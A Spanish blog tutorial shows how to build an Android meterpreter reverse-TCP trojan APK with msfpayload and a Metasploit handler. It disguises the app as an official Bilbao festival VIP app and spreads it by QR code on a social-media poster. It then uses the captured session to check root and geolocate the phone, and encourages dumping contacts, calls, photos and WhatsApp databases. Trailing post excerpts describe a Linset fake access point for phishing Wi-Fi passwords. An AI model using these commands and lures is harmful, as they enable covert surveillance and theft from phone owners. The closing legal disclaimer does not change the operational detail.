Ir al contenido principal

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET



Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android.

El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android).

Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload.

Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal.

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk

Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nuestra App en el escritorio, previamente habremos hecho un cd Desktop para crear el payload en el escritorio, de lo contrario me parece que se crea en el directorio Home, ahí tenéis una imagen del proceso anterior




Una vez terminado el payload, arrancamos el metasploit, cuando arranque el script ejecutamos msfupdate, por si lo tenéis sin actualizar.

Ahora escogemos el exploit, introducimos use exploit/multi/handler , después toca escoger el payload
set payload android/meterpreter/reverse_tcp y por ultimo el local host (192.168.1.11) y el puerto local (8888) e introducimos por ultimo el comando exploit como muestra la siguiente imagen

Una vez ejecutada la orden exploit, metasploit se queda a la espera de que algún "usuario" instale y ejecute nuestra aplicación.


I. Recolectando clientes 

Ahora ya tenemos nuestra aplicación, pero necesitamos usuarios, en este caso dispuestos a pasar una semana en las fiestas de bilbao, como pudisteis observar en el payload el nombre que escogí fue fiestasbilbao.apk, ahora interviene nuestra imaginación, la habilidad con la edición de imágenes y la herramienta S.E.T  (Social Engineering Toolkit) esta herramienta también viene incluida en Kali linux, aquí tenéis una pequeña guia de como crear un QR con SET . Recordar que antes de crear el código debéis tener alojada la aplicación en algún servidor FTP ya sea propio o de alojamiento gratuito Una vez tengamos el código QR creado que nos dirige hacia un servidor FTP, donde esta alojada nuestra aplicación esperando a ser descargada.

Bien, ahora toca darle imaginación al asunto... creando un cartel que será distribuido por redes sociales, impreso en locales y demás. (5 minutos empleé en el cartel, ¿no esta tan mal no?)
Imagen creada con Photoshop Integrando el QR para descargar la APP

Ahora todo depende de la promoción que recibió el cartel, fijo todos quieren un acceso VIP a los recintos ;)

Bien ! al parecer nuestro primer "usuario" descargó e instalo la App Oficial !

Finalmente tenemos la sesión meterpreter activada y esperando a que le deis uso, introduciendo help en la linea de meterpreter, nos mostrará todo lo que podemos hacer en el dispositivo.

En mi caso decidí probar el check root (Si el teléfono esta rooteado y cae en esta "trampa" el daño puede ser de una magnitud mucho mayor) y la localización.

Como podéis observar el check_root y geolocate, he de decir este ultimo tiene una precisión de 5m de error (en mi caso)
Ahora solo queda ver hasta donde sois capaces de llegar... desde dumpear la lista de contactos, llamadas, imágenes ... hasta la "valiosa" base de datos de WhatsApp .

AQUÍ tenéis un enlace de interés relacionado con esta practica .

 Recordar si tenéis alguna duda o alguna pregunta dejarla en comentarios! 

Podéis seguirme en twitter @jdavidsora

ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS 

Entradas populares de este blog

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset

Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET. LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente. 1. Escanea la red. 2. Selecciona la red. 3. Busca handshake (se puede usar sin handshake) 4. Se elige una de las varias interfaces web en diferentes idiomas 5. Se monta un AP Falso imitando al original 6. Se crea un servidor DHCP sobre el AP Falso 7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante) 8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4) 9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir 10. Se desautentifica a todos los usarios de la red, esperando que se conec

Wifislax 4.9 - I Conseguir acceso a redes WiFi protegidas con WPA/WPA2-PSK AirCrack

En esta practica se ha usado la ultima versión de Wifislax la 4.9  la podéis descargar AQUÍ  , también han sido necesarios un pendrive para acceder al live CD y una Antena Alfa Network AWUS036H Para los que empezáis de cero, necesitaremos una ISO de WIfislax  un dispositivo de almacenamiento USB y ganas de probar la seguridad de nuestra red WiFi...  Comenzamos!  creamos desde un sistema Windows el live CD de Wifislax con Yumi. Ejecutamos Yumi y seleccionamos la distribución o sistema para hacerla booteable desde el pendrive, acto seguido selecionamos la ISO de Wifislax y le damos a crear, podemos escoger los parámetros, como formatear el pendrive antes de crear el arranque y demás. Para arrancar desde el un dispositivo de almacenamiento USB es necesario que nuestra placa base soporte el arranque desde USB, en mi caso con habilitarlo desde la bios y pulsar F12 en el arranque ya me permite bootear un sistema de almacenamiento USB,al arrancar el pendrive nos aparecerá el menú